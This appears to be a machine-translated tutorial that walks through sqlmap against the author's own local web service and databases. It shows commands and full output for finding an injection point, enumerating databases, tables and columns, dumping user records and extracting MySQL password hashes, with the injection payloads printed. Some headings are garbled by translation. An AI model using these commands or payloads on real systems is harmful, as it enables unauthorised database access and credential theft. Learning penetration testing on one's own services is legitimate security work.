directory

  • sqlmap

  • The installation

  • View the Help documentation

  • Chinese document

  • Directly connected database

    • Service database (mysql)
    • File database (SQLite)

  • Primary field

    • 1. Scan for injection points
    • 2. Check all database — DBS according to the injection point
    • 3. Query all tables based on the specified database
    • Mysql > alter table select * from ‘mysql’;
    • 4. Query the data in the table based on the field name
    • 5. Obtain the current database user and hash password

  • The last

    • The resources

sqlmap

Sqlmap is an open source penetration testing tool that automatically detects and exploits SQL injection defects and the process of taking over the database server. It has a powerful detection engine, many niche features for the ultimate penetration tester, and extensive switches such as fingerprinting from the database, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

The installation

pip install sqlmap

View the Help documentation

sqlmap -hh

Chinese document

sqlmap.campfire.ga/

Directly connected database

Service database (mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

Mysql ://root:[email protected]:3306/uniapp_shop” -f –banner — DBS –users

File database (SQLite)

DBMS://DATABASE_FILEPATH

sqlmap -d “sqlite3://D:\apiTestDjango\db.sqlite3” -f –banner –dbs –tables

Primary field

This is a local service, the purpose is to learn the use of SQLMAP, please do not do illegal things scan project source code for: gitee.com/zy7y/uniapp…

1. Scan for injection points

Command: sqlmap -u http://127.0.0.1/v1/getnews? newid=1

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid = 1 ___ __H__ ___ ___ [and] _____ ___ ___ {1.5.5 # PIP} | -- - |. ["]. | |. | | ___ | _ _ [.] | _ _ - | | __, | _ | | _ | V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:34:37 /2021-05-14/ [13:34:37] [INFO] resuming back-end DBMS 'mysql' [13:34:37] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: newid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Newid =13 AND 6236=6236 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=13 UNION ALL SELECT X71786b7a71 x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e x716a6a7a71 CONCAT (0, 0, 0), NUL L,NULL,NULL,NULL-- - --- [13:34:37] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [13:34:37] [INFO] touchdatelogged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1' [*] ending @ 13:34:37/2021-05-14 /#Title: Generic UNION Query (NULL) -5 columns Injection point
Copy the code

2. Check all database — DBS according to the injection point

Command: sqlmap -u http://127.0.0.1/v1/getnews? newid=1 –dbs

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid = 1 - DBS ___ __H__ ___ ___ ['] _____ _____ _____ {1.5.5 # PIP} | -- - |. [']. | '. | | | ___ | _ ["] _ _ - | | _ | __, | _ | | _ | V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:40:12 /2021-05-14/ [13:40:12] [INFO] resuming back-end DBMS 'mysql' [13:40:12] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: newid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Newid =13 AND 6236=6236 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=13 UNION ALL SELECT X71786b7a71 x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e x716a6a7a71 CONCAT (0, 0, 0), NUL L,NULL,NULL,NULL-- - --- [13:40:12] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [13:40:12] [INFO] Database names available databases [6]: [*] atplant [*] information_schema [*] mysql [*] performance_schema [*] sys [*] uniapp_shop [13:40:12] [INFO] fetched Data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\ Output \127.0.0.1' [*] Ending @ 13:40:12/2021-05-14 /Copy the code

3. Query all tables based on the specified database

Command: sqlmap -u http://127.0.0.1/v1/getnews? newid=1 -D uniapp_shop –tables

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid uniapp_shop = 1 - D - tables ___ __H__ ___ ___ ____ ___ ___ [.] {1.5.5 # PIP} | -- - |. [(]. | '. | | | ___ | _ [and] _ _ - | | _ | __, |  _| |_|V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:57:46 /2021-05-14/ [14:57:47] [INFO] resuming back-end DBMS 'mysql' [14:57:47] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: Newid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=1 UNION ALL SELECT X7162626b71 NULL, CONCAT (0, 0 x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c, 0 x7170706271 ),NULL,NULL,NULL-- - --- [14:57:47] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [14:57:47] [INFO] fetching tables for database: 'uniapp_shop' database: uniapp_shop [36 tables] +----------------------------+ | dt_article | | dt_article_albums | | dt_article_attach | | dt_article_attribute_field | | dt_article_attribute_value | | dt_article_category | | dt_article_comment | | dt_brands |  | dt_channel | | dt_channel_field | | dt_channel_site | | dt_express | | dt_feedback | | dt_link | | dt_mail_template |  | dt_manager | | dt_manager_log | | dt_manager_role | | dt_manager_role_value | | dt_navigation | | dt_order_goods | | dt_orders | | dt_payment | | dt_sms_template | | dt_user_amount_log | | dt_user_attach_log | | dt_user_code | | dt_user_group_price | | dt_user_groups | | dt_user_login_log | | dt_user_message | | dt_user_oauth | | dt_user_oauth_app  | | dt_user_point_log | | dt_user_recharge | | dt_users | +----------------------------+ [14:57:47] [INFO] fetched data Logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1' [*] Ending @ 14:57:47/2021-05-14 /Copy the code

Mysql > alter table select * from ‘mysql’;

Command: sqlmap -u http://127.0.0.1/v1/getnews? newid=1 -D uniapp_shop -T dt_users –columns

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid = 1 - D uniapp_shop -t dt_users - columns ___ __H__ ___ ___ [] _____ ___ ___ {1.5.5 # PIP} | -- - |. []. | '. | | | ___ | _ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:59:01 /2021-05-14/ [14:59:01] [INFO] resuming back-end DBMS 'mysql' [14:59:01] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: Newid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=1 UNION ALL SELECT X7162626b71 NULL, CONCAT (0, 0 x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c, 0 x7170706271 ),NULL,NULL,NULL-- - --- [14:59:01] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop' database: uniapp_shop Table: dt_users [22 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | exp | int | | address | varchar(255) | | amount | double | | area | varchar(255) | | avatar | varchar(255) | | birthday | timestamp | | email | varchar(50) | | group_id | int | | id | int | | mobile | varchar(20) | | msn | varchar(100) | | nick_name | varchar(100) | | password | varchar(100) | | point | int | | qq | varchar(20) | | reg_ip | varchar(20) | | reg_time | timestamp | | salt | varchar(20) | | sex | varchar(20) | | status | int | | telphone | varchar(50) | | user_name | varchar(100) | +-----------+--------------+ [14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1' [*] ending @ 14:59:02/2021-05-14 /Copy the code

4. Query the data in the table based on the field name

Note: when using – dump is against the law, law service command: please don’t malicious attacks others sqlmap -u http://127.0.0.1/v1/getnews? newid=1 –batch -D uniapp_shop -T dt_users -C user_name,id –dump

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid = 1 - batch dt_users uniapp_shop - T - D - C user_name, id - dump ___ __H__ ___ ___ ['] _____ ___ ___ {1.5.5 # PIP} | -- - |. [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:03:52 /2021-05-14/ [15:03:52] [INFO] resuming back-end DBMS 'mysql' [15:03:52] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: Newid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=1 UNION ALL SELECT X7162626b71 NULL, CONCAT (0, 0 x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c, 0 x7170706271 ),NULL,NULL,NULL-- - --- [15:03:52] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop' Database: uniapp_shop Table: dt_users [1 entry] +-----------+----+ | user_name | id | +-----------+----+ | test | 1 | +-----------+----+ [15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv' [15:03:53] [INFO] touchdata Logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1' [*] Ending @ 15:03:53/2021-05-14 /Copy the code

5. Obtain the current database user and hash password

Command: sqlmap -u http://127.0.0.1/v1/getnews? newid=1 –passwords

(venv) D: \ sqlmaptools > sqlmap -u http://127.0.0.1/v1/getnews? Newid = 1 - passwords ___ __H__ ___ ___ [(] _____ _____ _____ {1.5.5 # PIP} | -- - |. [']. | '. | | | ___ | _ [(] _ _ - | | _ | __, | _ | | _ | V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:40:02 /2021-05-14/ [14:40:02] [INFO] resuming back-end DBMS 'mysql' [14:40:02] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: newid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Newid =13 AND 6236=6236 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: newid=13 UNION ALL SELECT X71786b7a71 x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e x716a6a7a71 CONCAT (0, 0, 0), NUL L,NULL,NULL,NULL-- - --- [14:40:02] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [14:40:02] [INFO] Fetching database users password hashes do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y [14:40:05] [WARNING] no clear password(s) found database management system users password hashes: [*] develop [1]: password hash: $A $005 $~ W \ \ u0005K \ \ u000b \ \ u0017d \ \ u0013 \ \ u0002 * 4 j_s Qg \ \ u0007 \ \ u0015 \ \ u0001GlIeJWW2iJzFpb0bGTlr5 6 kbd1haqt2iqefbubepkd [*] mysql.infoschema [1]: password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED [*] mysql.session [1]: password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED [*] mysql.sys [1]: password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED [*] root [2]: password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3 [14:40:05] [INFO] fetched data Logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1' [*] Ending @ 14:40:05/2021-05-14 /Copy the code

The last

Please do not use it maliciously to attack other people’s services, do not touch the law, for advanced use please check the official documentation

The resources

Sqlmap Chinese document SQL injection practice